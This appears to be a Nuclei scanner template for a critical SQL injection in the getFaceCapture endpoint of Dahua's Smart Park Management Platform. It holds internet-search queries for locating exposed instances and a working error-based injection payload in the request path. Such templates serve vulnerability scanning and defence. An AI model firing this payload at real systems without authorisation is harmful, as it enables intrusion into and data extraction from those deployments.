id: dahua_smart_park_management_getfacecapture_sqli

info:
  name: dahua_smart_park_management_getfacecapture_sqli
  author: Anonymous
  severity: critical
  description: 大华智慧园区综合管理平台 getFaceCapture SQL 注入
  metadata:
    fofa-query: app="dahua-智慧园区综合管理平台"
    hunter-query: favicon:"210a3c89d4ab5effa18d6dd7a9627376" AND web.title:"IP-guard"
    quake-query: app.name=="Dahua 大华 智慧园区管理平台"
  tags: dahua,sqli,hw,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(%27sycnb%27)),0x7e),1)--%22%7D/extend/%7B%7D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 08f41694b6cafa017b2968c
          - soap:Server

      - type: status
        status:
          - 500
# digest: 4a0a004730450221009eadfe186b27c8b5e086a0eb45bc6fd8930e05f01b79cdd5023f939623f5e43a0220539dd8a95bb927d7e475b12fa1f701bff76202b8e3a88ad5fcdddd4168682577:6b2dd5af372f02ed15a56faf8ad98cf9